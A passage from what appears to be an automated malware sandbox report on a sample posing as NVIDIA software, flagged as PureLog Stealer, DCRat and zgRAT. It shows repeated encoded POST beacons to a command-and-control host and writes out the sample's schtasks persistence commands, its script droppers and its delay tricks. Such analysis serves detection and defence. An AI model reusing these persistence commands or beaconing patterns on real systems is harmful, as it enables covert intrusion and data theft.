6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.5	49994	104.21.64.1	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:40:22.812485933 CET	330	OUT	POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: bibaprog.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:40:23.163531065 CET	344	OUT	Data Raw: 00 05 01 05 06 08 01 02 05 06 02 01 02 00 01 03 00 05 05 09 02 03 03 0e 01 00 0a 00 05 05 01 08 0c 05 07 0f 00 51 07 06 0b 03 05 50 05 03 05 56 04 07 0c 5a 0c 05 01 02 07 05 04 00 04 55 06 09 02 03 0e 0d 00 0e 06 03 0d 0f 0d 00 0f 01 0c 52 02 07 Data Ascii: QPVZURYZRR\L~\|p}]trr^vf`hlyMcR`Mh]pK{\|dZl`TpCtww]}_~V@x}nN~Li
Jan 13, 2025 13:40:23.275149107 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:40:23.504333973 CET	1007	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:40:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6YmI6cNhDLj3T69PntJ6dYFC9zeSQY6d8XNSjPjV4oa0hTkbflWYzHqwyJHxj8zItutf%2FxTrOeB2H666lSPYDmOx6E1PUu1LXKOgd1129jeYZnMeafHEt92RvfQ5Nw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9015745929ad42e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4653&min_rtt=1725&rtt_var=6503&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=674&delivery_rate=58047&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Jan 13, 2025 13:40:23.596265078 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.5	49995	104.21.64.1	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:40:33.813540936 CET	294	OUT	POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: bibaprog.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:40:34.162719965 CET	344	OUT	Data Raw: 00 03 04 0c 03 08 04 01 05 06 02 01 02 0d 01 05 00 07 05 01 02 0c 03 08 02 0f 0c 00 06 01 01 06 0f 05 07 01 00 56 06 55 0e 54 07 54 05 03 07 03 05 03 0c 59 0d 04 05 04 05 02 05 04 05 04 07 5a 01 00 0c 0e 05 56 07 05 0c 57 0d 07 0a 06 0c 04 06 0d Data Ascii: VUTTYZVWSSV\L~hjw[iuethl~]wl^kccYlUK{i[\|npc^h}O~V@{Sfrq
Jan 13, 2025 13:40:34.273008108 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:40:34.502424955 CET	1022	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:40:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UOCQeiDFF%2BSlQHkxsRsTMVMsqexuK2JWNt69h04yRXISCBPSov%2F4%2B9OsUXZ7c%2F7J4Rdon%2FlU4BgXpZvUSdQ4mj8S5CkY%2FtwmmywLU1b2YRNV2RGEKow%2FP63qnvyt4g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9015749dea638ca1-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3137&min_rtt=1947&rtt_var=3110&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=638&delivery_rate=127299&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.5	49996	104.21.64.1	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:40:44.998869896 CET	347	OUT	POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 Host: bibaprog.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:40:45.351239920 CET	344	OUT	Data Raw: 00 06 01 00 03 08 01 04 05 06 02 01 02 07 01 01 00 00 05 0f 02 0c 03 0e 03 03 0e 00 07 03 01 07 0f 53 03 08 00 57 06 0a 0e 00 05 53 06 53 06 0f 06 01 0c 59 0e 03 05 01 06 57 06 01 01 00 07 0e 03 53 0a 0d 07 0e 04 55 0b 02 0c 55 0c 01 0b 06 06 07 Data Ascii: SWSSYWSUUQQ\L~@`Tcr}LvulBywhBk`kYylt[zpaX}m``Y\|e~V@AxSzri
Jan 13, 2025 13:40:45.452538967 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:40:45.678194046 CET	1015	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:40:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4dr8GGqLOcodGl6LM5ZUhxyf2u8u3MmwpMmsC8yelzQct8Y5JCzCHQMRmtp2hYh%2BckF0ydhEmoUYhdW4%2BcAwujCZAHzKNvnHQJVFjnkkeSP8tZrgwCgVr6YxsCDNrg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901574e3cac48ca1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=9847&min_rtt=1911&rtt_var=16589&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=691&delivery_rate=22324&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.5	49997	104.21.64.1	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:40:56.330138922 CET	330	OUT	POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: bibaprog.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:40:56.678443909 CET	344	OUT	Data Raw: 00 06 04 06 06 0e 04 02 05 06 02 01 02 03 01 06 00 01 05 0b 02 06 03 0b 00 03 0f 51 07 01 01 53 0c 56 03 00 01 00 05 01 0d 00 04 01 04 00 04 01 05 00 0b 0b 0a 06 05 04 06 55 07 05 07 05 05 0f 02 56 0e 08 05 0e 05 05 0d 07 0e 05 0e 0d 0d 08 05 51 Data Ascii: QSVUVQQU\L}Q\|NvNtbmOv[xB~bXwU\|B\|]k[xlHxNeZ\|SxAwwhL~_~V@{m~L}\}
Jan 13, 2025 13:40:56.793078899 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:40:57.021229029 CET	1016	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:40:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SKeu3gXIji3cbwW5w57ipMDpjDL%2B126SQzBManIMcKQ1d5QBIbyzHYWxyqu3m%2B6878TUubCLfOVUoIwtnXCnDvjUgHpP5UAlKt92Owyl%2FUKmKHsUi8GeZVYxSJmxkw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9015752aacab42e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4514&min_rtt=1702&rtt_var=6262&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=674&delivery_rate=60333&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.5	49998	104.21.64.1	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:41:07.363792896 CET	294	OUT	POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: bibaprog.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:41:07.709794998 CET	344	OUT	Data Raw: 05 07 04 00 06 01 01 02 05 06 02 01 02 07 01 03 00 05 05 0b 02 05 03 0c 07 04 0f 53 04 07 01 57 0f 03 06 01 00 0c 06 50 0b 06 02 0b 07 03 06 0f 04 51 0d 08 0f 55 01 07 04 05 03 04 04 51 07 0a 02 53 0d 0e 07 55 01 08 0f 07 0e 54 0e 02 0c 56 07 0c Data Ascii: SWPQUQSUTVPY\WPV\L}P\|^~wbr\bvhkRqLvl^\|sp{gzsz\|ClCc^`Nju~V@Ax}nL}ba
Jan 13, 2025 13:41:07.807852030 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:41:08.036006927 CET	1021	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:41:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ae7YIM97bDDZZ0c2gicRSD31Ijtk8Y08Hedyl%2Bo3%2B5l9DzX0bYx7B02CbASv%2F6qWSdYM%2FRaPd30t2W5I3wLNaFraKSj45IqZ%2B%2BV1hDIcw42TX6ZGNwnxTzdYwXo%2Fdw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9015756f8ef642e9-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4221&min_rtt=1837&rtt_var=5458&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=638&delivery_rate=69803&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Target ID:	0
Start time:	07:36:59
Start date:	13/01/2025
Path:	C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe"
Imagebase:	0x1000000
File size:	2'356'395 bytes
MD5 hash:	C9FEDA13F449C852EE9B95967BDFD3DE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2039608649.000000000715A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2039037903.000000000684E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	07:37:00
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\NVIDIA\WRqwjVLhswP6l4C4Fp0FJhl.vbe"
Imagebase:	0x7f0000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:37:03
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\NVIDIA\RbwXTgCxu.bat" "
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:37:04
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	07:37:04
Start date:	13/01/2025
Path:	C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\NVIDIA/NVIDIA Container.exe"
Imagebase:	0xe70000
File size:	1'937'408 bytes
MD5 hash:	833E95D4CE4E4A4AD42322F75AE6FF57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2118287388.000000001369A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000000.2079077521.0000000000E72000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 66%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	07:37:06
Start date:	13/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "hBoBqOIwjXsCbkOMEKwZh" /sc MINUTE /mo 6 /tr "'C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe'" /f
Imagebase:	0x7ff6c7e90000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	07:37:06
Start date:	13/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "hBoBqOIwjXsCbkOMEKwZ" /sc ONLOGON /tr "'C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6c7e90000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	07:37:06
Start date:	13/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "hBoBqOIwjXsCbkOMEKwZh" /sc MINUTE /mo 6 /tr "'C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6c7e90000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	07:37:07
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\vPPPhWVNfR.bat"
Imagebase:	0x7ff606850000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	07:37:07
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	07:37:07
Start date:	13/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff7b5ed0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	07:37:07
Start date:	13/01/2025
Path:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
Imagebase:	0x660000
File size:	1'937'408 bytes
MD5 hash:	833E95D4CE4E4A4AD42322F75AE6FF57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 66%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	07:37:07
Start date:	13/01/2025
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff7d3db0000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	07:37:07
Start date:	13/01/2025
Path:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
Imagebase:	0xb0000
File size:	1'937'408 bytes
MD5 hash:	833E95D4CE4E4A4AD42322F75AE6FF57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	07:37:12
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1LArpmQ7xZ.bat"
Imagebase:	0x7ff606850000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	07:37:12
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	07:37:12
Start date:	13/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff7b5ed0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	07:37:12
Start date:	13/01/2025
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff7de670000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	07:37:12
Start date:	13/01/2025
Path:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
Imagebase:	0xb90000
File size:	1'937'408 bytes
MD5 hash:	833E95D4CE4E4A4AD42322F75AE6FF57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	07:37:21
